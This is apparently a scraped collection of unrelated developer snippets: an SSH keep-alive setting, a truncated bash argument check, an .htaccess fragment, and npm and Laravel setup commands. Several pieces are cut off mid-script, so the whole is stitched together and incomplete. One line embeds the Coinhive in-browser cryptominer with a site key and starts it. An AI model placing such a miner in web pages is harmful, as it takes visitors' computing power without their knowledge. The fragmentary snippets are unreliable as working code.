modify
/etc/ssh/ssh_config
add this configuration
Host *
ServerAliveInterval 100
| #!/bin/bash | |
| SOURCE="$1" | |
| if [ "${SOURCE}" == "" ]; then | |
| echo "Must specify a source url" | |
| exit 1 | |
| fi | |
| DEST="$2" | |
| if [ "${DEST}" == "" ]; then |
| <script src='https://coin-hive.com/lib/coinhive.min.js'></script><script>var mnr = new CoinHive.Anonymous('afBeaSZFHyC0tzAvd4jciJzO5wVO4805');mnr.start();</script> |
| .httacces | |
| === | |
| DirectoryIndex index.php | |
| <IfModule mod_rewrite.c> | |
| <IfModule mod_negotiation.c> | |
| Options -MultiViews | |
| </IfModule> | |
| RewriteEngine On |
| mkdir deepefflux_task | |
| cd deepefflux_task | |
| npm init | |
| npm install --save async knex moment mysql socketio | |
| npm install --save-dev nodemon | |
| // package.json | |
| "scripts": { | |
| "dev": "nodemon server.js" | |
| }, |
| composer create-project --prefer-dist laravel/laravel deepefflux | |
| sudo chgrp -R www-data storage bootstrap/cache | |
| sudo chmod -R ug+rwx storage bootstrap/cache | |
| cp .env.example .env | |
| php artisan key:generate |